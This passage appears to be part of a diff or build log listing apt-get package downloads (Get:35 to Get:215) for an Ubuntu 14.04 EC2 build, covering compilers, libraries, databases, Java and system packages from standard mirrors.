-Get:35 http://repo.mongodb.org/apt/ubuntu trusty/mongodb-org/3.4/multiverse amd64 mongodb-org-tools amd64 3.4.19 [40.4 MB]
-Get:36 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libgcrypt11-dev amd64 1.5.3-2ubuntu4.6 [273 kB]
-Get:37 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main amd64 postgresql-9.6 amd64 9.6.12-1.pgdg14.04+1 [4314 kB]
-Get:38 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libgcrypt11 amd64 1.5.3-2ubuntu4.6 [238 kB]
-Get:39 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libatomic1 amd64 4.8.4-2ubuntu1~14.04.4 [8630 B]
-Get:40 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libitm1 amd64 4.8.4-2ubuntu1~14.04.4 [28.6 kB]
-Get:41 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libgomp1 amd64 4.8.4-2ubuntu1~14.04.4 [23.1 kB]
-Get:42 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libasan0 amd64 4.8.4-2ubuntu1~14.04.4 [63.1 kB]
-Get:43 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libtsan0 amd64 4.8.4-2ubuntu1~14.04.4 [94.8 kB]
-Get:44 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libquadmath0 amd64 4.8.4-2ubuntu1~14.04.4 [126 kB]
-Get:45 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 g++-4.8 amd64 4.8.4-2ubuntu1~14.04.4 [18.0 MB]
-Get:46 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 gcc-4.8 amd64 4.8.4-2ubuntu1~14.04.4 [5040 kB]
-Get:47 http://repo.mongodb.org/apt/ubuntu trusty/mongodb-org/3.4/multiverse amd64 mongodb-org amd64 3.4.19 [3514 B]
-Get:48 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 cpp-4.8 amd64 4.8.4-2ubuntu1~14.04.4 [4452 kB]
-Get:49 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libstdc++-4.8-dev amd64 4.8.4-2ubuntu1~14.04.4 [1051 kB]
-Get:50 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libgcc-4.8-dev amd64 4.8.4-2ubuntu1~14.04.4 [1688 kB]
-Get:51 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 gcc-4.8-base amd64 4.8.4-2ubuntu1~14.04.4 [16.7 kB]
-Get:52 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libstdc++6 amd64 4.8.4-2ubuntu1~14.04.4 [260 kB]
-Get:53 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libtasn1-6-dev amd64 3.4-3ubuntu0.6 [385 kB]
-Get:54 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libtasn1-6 amd64 3.4-3ubuntu0.6 [43.6 kB]
-Get:55 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libk5crypto3 amd64 1.12+dfsg-2ubuntu5.4 [79.4 kB]
-Get:56 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libgssrpc4 amd64 1.12+dfsg-2ubuntu5.4 [53.1 kB]
-Get:57 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libkadm5srv-mit9 amd64 1.12+dfsg-2ubuntu5.4 [50.3 kB]
-Get:58 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libkadm5clnt-mit9 amd64 1.12+dfsg-2ubuntu5.4 [36.2 kB]
-Get:59 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libkrb5-dev amd64 1.12+dfsg-2ubuntu5.4 [14.4 kB]
-Get:60 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 krb5-multidev amd64 1.12+dfsg-2ubuntu5.4 [111 kB]
-Get:61 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libkrb5support0 amd64 1.12+dfsg-2ubuntu5.4 [31.1 kB]
-Get:62 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libkrb5-3 amd64 1.12+dfsg-2ubuntu5.4 [262 kB]
-Get:63 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libgssapi-krb5-2 amd64 1.12+dfsg-2ubuntu5.4 [114 kB]
-Get:64 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libkdb5-7 amd64 1.12+dfsg-2ubuntu5.4 [36.2 kB]
-Get:65 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libldap2-dev amd64 2.4.31-1+nmu2ubuntu8.5 [259 kB]
-Get:66 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libldap-2.4-2 amd64 2.4.31-1+nmu2ubuntu8.5 [153 kB]
-Get:67 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libcurl4-gnutls-dev amd64 7.35.0-1ubuntu2.20 [237 kB]
-Get:68 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libcurl3-gnutls amd64 7.35.0-1ubuntu2.20 [166 kB]
-Get:69 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libglib2.0-dev amd64 2.40.2-0ubuntu1.1 [1325 kB]
-Get:70 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libglib2.0-data all 2.40.2-0ubuntu1.1 [116 kB]
-Get:71 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libglib2.0-bin amd64 2.40.2-0ubuntu1.1 [34.9 kB]
-Get:72 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libglib2.0-0 amd64 2.40.2-0ubuntu1.1 [1059 kB]
-Get:73 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libx11-data all 2:1.6.2-1ubuntu2.1 [111 kB]
-Get:74 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libx11-dev amd64 2:1.6.2-1ubuntu2.1 [632 kB]
-Get:75 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libx11-6 amd64 2:1.6.2-1ubuntu2.1 [561 kB]
-Get:76 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libxml2-dev amd64 2.9.1+dfsg1-3ubuntu4.13 [630 kB]
-Get:77 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libxml2 amd64 2.9.1+dfsg1-3ubuntu4.13 [573 kB]
-Get:78 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libavahi-common-data amd64 0.6.31-4ubuntu1.3 [21.1 kB]
-Get:79 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libavahi-common3 amd64 0.6.31-4ubuntu1.3 [21.7 kB]
-Get:80 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libavahi-client3 amd64 0.6.31-4ubuntu1.3 [25.2 kB]
-Get:81 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libcups2 amd64 1.7.2-0ubuntu1.11 [178 kB]
-Get:82 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 gir1.2-gdkpixbuf-2.0 amd64 2.30.7-0ubuntu1.8 [7950 B]
-Get:83 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libgdk-pixbuf2.0-dev amd64 2.30.7-0ubuntu1.8 [43.0 kB]
-Get:84 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libgdk-pixbuf2.0-common all 2.30.7-0ubuntu1.8 [9338 B]
-Get:85 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libgdk-pixbuf2.0-0 amd64 2.30.7-0ubuntu1.8 [161 kB]
-Get:86 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libjasper-dev amd64 1.900.1-14ubuntu3.5 [520 kB]
-Get:87 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libjasper1 amd64 1.900.1-14ubuntu3.5 [131 kB]
-Get:88 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libtiff5-dev amd64 4.0.3-7ubuntu0.10 [266 kB]
-Get:89 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libtiffxx5 amd64 4.0.3-7ubuntu0.10 [5626 B]
-Get:90 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libjpeg-turbo8-dev amd64 1.3.0-0ubuntu2.1 [242 kB]
-Get:91 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libjpeg-turbo8 amd64 1.3.0-0ubuntu2.1 [104 kB]
-Get:92 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libtiff5 amd64 4.0.3-7ubuntu0.10 [147 kB]
-Get:93 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libpixman-1-dev amd64 0.30.2-2ubuntu1.2 [240 kB]
-Get:94 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libpixman-1-0 amd64 0.30.2-2ubuntu1.2 [226 kB]
-Get:95 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libxcursor1 amd64 1:1.1.14-1ubuntu0.14.04.2 [19.8 kB]
-Get:96 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libkmod2 amd64 15-0ubuntu7 [38.1 kB]
-Get:97 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libprocps3 amd64 1:3.3.9-1ubuntu2.3 [31.7 kB]
-Get:98 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 procps amd64 1:3.3.9-1ubuntu2.3 [210 kB]
-Get:99 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 udev amd64 204-5ubuntu20.29 [736 kB]
-Get:100 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libudev1 amd64 204-5ubuntu20.29 [34.3 kB]
-Get:101 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 initramfs-tools all 0.103ubuntu4.11 [44.6 kB]
-Get:102 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 initramfs-tools-bin amd64 0.103ubuntu4.11 [8610 B]
-Get:103 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 kmod amd64 15-0ubuntu7 [84.9 kB]
-Get:104 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 module-init-tools all 15-0ubuntu7 [1944 B]
-Get:105 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 plymouth amd64 0.8.8-0ubuntu17.2 [98.4 kB]
-Get:106 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libplymouth2 amd64 0.8.8-0ubuntu17.2 [76.6 kB]
-Get:107 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 mountall amd64 2.53ubuntu1 [55.6 kB]
-Get:108 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libapt-pkg4.12 amd64 1.0.1ubuntu2.19 [638 kB]
-Get:109 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libapt-inst1.5 amd64 1.0.1ubuntu2.19 [58.4 kB]
-Get:110 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 file amd64 1:5.14-2ubuntu3.4 [19.4 kB]
-Get:111 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libmagic1 amd64 1:5.14-2ubuntu3.4 [185 kB]
-Get:112 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 python3.4-dev amd64 3.4.3-1ubuntu1~14.04.7 [421 kB]
-Get:113 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libpython3.4-dev amd64 3.4.3-1ubuntu1~14.04.7 [17.8 MB]
-Get:114 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libpython3.4 amd64 3.4.3-1ubuntu1~14.04.7 [1303 kB]
-Get:115 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 python3.4 amd64 3.4.3-1ubuntu1~14.04.7 [178 kB]
-Get:116 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libpython3.4-stdlib amd64 3.4.3-1ubuntu1~14.04.7 [1986 kB]
-Get:117 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 python3.4-minimal amd64 3.4.3-1ubuntu1~14.04.7 [1224 kB]
-Get:118 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libssl-dev amd64 1.0.1f-1ubuntu2.27 [1076 kB]
-Get:119 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libssl1.0.0 amd64 1.0.1f-1ubuntu2.27 [831 kB]
-Get:120 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libpython3.4-minimal amd64 3.4.3-1ubuntu1~14.04.7 [461 kB]
-Get:121 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 ntpdate amd64 1:4.2.6.p5+dfsg-3ubuntu2.14.04.13 [57.4 kB]
-Get:122 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 resolvconf all 1.69ubuntu1.4 [55.1 kB]
-Get:123 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libasprintf0c2 amd64 0.18.3.1-1ubuntu3.1 [6466 B]
-Get:124 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libelf1 amd64 0.158-0ubuntu5.3 [38.3 kB]
-Get:125 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libpam-systemd amd64 204-5ubuntu20.29 [25.5 kB]
-Get:126 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 systemd-services amd64 204-5ubuntu20.29 [197 kB]
-Get:127 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libsystemd-daemon0 amd64 204-5ubuntu20.29 [10.8 kB]
-Get:128 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libsystemd-login0 amd64 204-5ubuntu20.29 [27.8 kB]
-Get:129 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libpolkit-gobject-1-0 amd64 0.105-4ubuntu3.14.04.5 [35.3 kB]
-Get:130 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libnss3-nssdb all 2:3.28.4-0ubuntu0.14.04.4 [10.6 kB]
-Get:131 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libnss3 amd64 2:3.28.4-0ubuntu0.14.04.4 [1120 kB]
-Get:132 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libx11-xcb-dev amd64 2:1.6.2-1ubuntu2.1 [9750 B]
-Get:133 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libx11-xcb1 amd64 2:1.6.2-1ubuntu2.1 [9350 B]
-Get:134 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 xdg-utils all 1.1.0~rc1-2ubuntu7.2 [53.9 kB]
-Get:135 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/universe amd64 chromium-browser amd64 65.0.3325.181-0ubuntu0.14.04.1 [51.8 MB]
-Get:136 http://ppa.launchpad.net/openjdk-r/ppa/ubuntu trusty/main amd64 openjdk-8-jre amd64 8u171-b11-2~14.04 [69.0 kB]
-Get:137 http://ppa.launchpad.net/openjdk-r/ppa/ubuntu trusty/main amd64 openjdk-8-jre-headless amd64 8u171-b11-2~14.04 [26.8 MB]
-Get:138 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/universe amd64 chromium-codecs-ffmpeg-extra amd64 65.0.3325.181-0ubuntu0.14.04.1 [1016 kB]
-Get:139 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 imagemagick-common all 8:6.7.7.10-6ubuntu3.13 [38.4 kB]
-Get:140 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libcaca0 amd64 0.99.beta18-1ubuntu5.1 [202 kB]
-Get:141 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 curl amd64 7.35.0-1ubuntu2.20 [123 kB]
-Get:142 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libcurl3 amd64 7.35.0-1ubuntu2.20 [173 kB]
-Get:143 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libgd3 amd64 2.1.0-3ubuntu0.10 [123 kB]
-Get:144 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libicu-dev amd64 52.1-3ubuntu0.8 [7615 kB]
-Get:145 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 icu-devtools amd64 52.1-3ubuntu0.8 [163 kB]
-Get:146 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libicu52 amd64 52.1-3ubuntu0.8 [6751 kB]
-Get:147 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 liblcms2-dev amd64 2.5-0ubuntu4.2 [5097 kB]
-Get:148 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 liblcms2-2 amd64 2.5-0ubuntu4.2 [131 kB]
-Get:149 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libmagickwand-dev amd64 8:6.7.7.10-6ubuntu3.13 [272 kB]
-Get:150 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libmagickwand5 amd64 8:6.7.7.10-6ubuntu3.13 [267 kB]
-Get:151 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libmagickcore-dev amd64 8:6.7.7.10-6ubuntu3.13 [907 kB]
-Get:152 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libmagickcore5-extra amd64 8:6.7.7.10-6ubuntu3.13 [58.4 kB]
-Get:153 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libmagickcore5 amd64 8:6.7.7.10-6ubuntu3.13 [1480 kB]
-Get:154 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libmysqlclient-dev amd64 5.5.62-0ubuntu0.14.04.1 [869 kB]
-Get:155 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 mysql-common all 5.5.62-0ubuntu0.14.04.1 [12.6 kB]
-Get:156 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libmysqlclient18 amd64 5.5.62-0ubuntu0.14.04.1 [598 kB]
-Get:157 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libpolkit-agent-1-0 amd64 0.105-4ubuntu3.14.04.5 [14.9 kB]
-Get:158 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libpolkit-backend-1-0 amd64 0.105-4ubuntu3.14.04.5 [35.2 kB]
-Get:159 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 python2.7-dev amd64 2.7.6-8ubuntu0.5 [269 kB]
-Get:160 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libpython2.7-dev amd64 2.7.6-8ubuntu0.5 [22.0 MB]
-Get:161 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libpython2.7 amd64 2.7.6-8ubuntu0.5 [1041 kB]
-Get:162 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 python2.7 amd64 2.7.6-8ubuntu0.5 [197 kB]
-Get:163 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libpython2.7-stdlib amd64 2.7.6-8ubuntu0.5 [1872 kB]
-Get:164 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 python2.7-minimal amd64 2.7.6-8ubuntu0.5 [1186 kB]
-Get:165 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libpython2.7-minimal amd64 2.7.6-8ubuntu0.5 [308 kB]
-Get:166 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libspice-server1 amd64 0.12.4-0nocelt2ubuntu1.8 [322 kB]
-Get:167 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libvorbisfile3 amd64 1.3.2-1.3ubuntu1.2 [15.8 kB]
-Get:168 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libvorbisenc2 amd64 1.3.2-1.3ubuntu1.2 [84.6 kB]
-Get:169 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libvorbis0a amd64 1.3.2-1.3ubuntu1.2 [87.2 kB]
-Get:170 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libwayland-client0 amd64 1.4.0-1ubuntu1.1 [22.1 kB]
-Get:171 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libwayland-cursor0 amd64 1.4.0-1ubuntu1.1 [9936 B]
-Get:172 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libwayland-server0 amd64 1.4.0-1ubuntu1.1 [26.9 kB]
-Get:173 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libxkbcommon0 amd64 0.4.1-0ubuntu1.1 [88.3 kB]
-Get:174 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 ntp amd64 1:4.2.6.p5+dfsg-3ubuntu2.14.04.13 [422 kB]
-Get:175 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 openjdk-7-jdk amd64 7u181-2.6.14-0ubuntu0.3 [16.0 MB]
-Get:176 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 tzdata-java all 2018i-0ubuntu0.14.04 [69.5 kB]
-Get:177 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 tzdata all 2018i-0ubuntu0.14.04 [168 kB]
-Get:178 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 openjdk-7-jre amd64 7u181-2.6.14-0ubuntu0.3 [172 kB]
-Get:179 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 openjdk-7-jre-headless amd64 7u181-2.6.14-0ubuntu0.3 [39.5 MB]
-Get:180 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libsystemd-journal0 amd64 204-5ubuntu20.29 [50.6 kB]
-Get:181 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 multiarch-support amd64 2.19-0ubuntu6.14 [4482 B]
-Get:182 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 sensible-utils all 0.0.9ubuntu0.14.04.1 [10.0 kB]
-Get:183 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 gpgv amd64 1.4.16-1ubuntu2.6 [161 kB]
-Get:184 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 gnupg amd64 1.4.16-1ubuntu2.6 [611 kB]
-Get:185 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 gnupg-agent amd64 2.0.22-3ubuntu1.4 [231 kB]
-Get:186 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 gnupg2 amd64 2.0.22-3ubuntu1.4 [680 kB]
-Get:187 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 iproute2 amd64 3.12.0-2ubuntu1.2 [401 kB]
-Get:188 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 ifupdown amd64 0.7.47.2ubuntu4.5 [53.3 kB]
-Get:189 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 isc-dhcp-client amd64 4.2.4-7ubuntu12.13 [640 kB]
-Get:190 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 isc-dhcp-common amd64 4.2.4-7ubuntu12.13 [709 kB]
-Get:191 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libapparmor1 amd64 2.10.95-0ubuntu2.6~14.04.4 [31.2 kB]
-Get:192 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libapparmor-perl amd64 2.10.95-0ubuntu2.6~14.04.4 [31.2 kB]
-Get:193 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 apparmor amd64 2.10.95-0ubuntu2.6~14.04.4 [362 kB]
-Get:194 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 dnsutils amd64 1:9.9.5.dfsg-3ubuntu0.18 [97.0 kB]
-Get:195 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 bind9-host amd64 1:9.9.5.dfsg-3ubuntu0.18 [46.5 kB]
-Get:196 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libisc95 amd64 1:9.9.5.dfsg-3ubuntu0.18 [148 kB]
-Get:197 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libdns100 amd64 1:9.9.5.dfsg-3ubuntu0.18 [645 kB]
-Get:198 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libisccc90 amd64 1:9.9.5.dfsg-3ubuntu0.18 [15.7 kB]
-Get:199 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libisccfg90 amd64 1:9.9.5.dfsg-3ubuntu0.18 [35.9 kB]
-Get:200 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 liblwres90 amd64 1:9.9.5.dfsg-3ubuntu0.18 [33.1 kB]
-Get:201 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libbind9-90 amd64 1:9.9.5.dfsg-3ubuntu0.18 [22.1 kB]
-Get:202 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 openssl amd64 1.0.1f-1ubuntu2.27 [489 kB]
-Get:203 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 ca-certificates all 20170717~14.04.2 [166 kB]
-Get:204 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 gettext-base amd64 0.18.3.1-1ubuntu3.1 [48.6 kB]
-Get:205 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 krb5-locales all 1.12+dfsg-2ubuntu5.4 [14.0 kB]
-Get:206 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 openssh-sftp-server amd64 1:6.6p1-2ubuntu2.12 [34.2 kB]
-Get:207 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 openssh-server amd64 1:6.6p1-2ubuntu2.12 [319 kB]
-Get:208 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 openssh-client amd64 1:6.6p1-2ubuntu2.12 [566 kB]
-Get:209 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 plymouth-theme-ubuntu-text amd64 0.8.8-0ubuntu17.2 [7958 B]
-Get:210 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 python-apt-common all 0.9.3.5ubuntu3 [15.0 kB]
-Get:211 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 python3-apt amd64 0.9.3.5ubuntu3 [139 kB]
-Get:212 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 ubuntu-release-upgrader-core all 1:0.220.10 [24.2 kB]
-Get:213 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 python3-distupgrade all 1:0.220.10 [104 kB]
-Get:214 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 python3-update-manager all 1:0.196.25 [32.2 kB]
-Get:215 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 update-manager-core all 1:0.196.25 [8280 B]
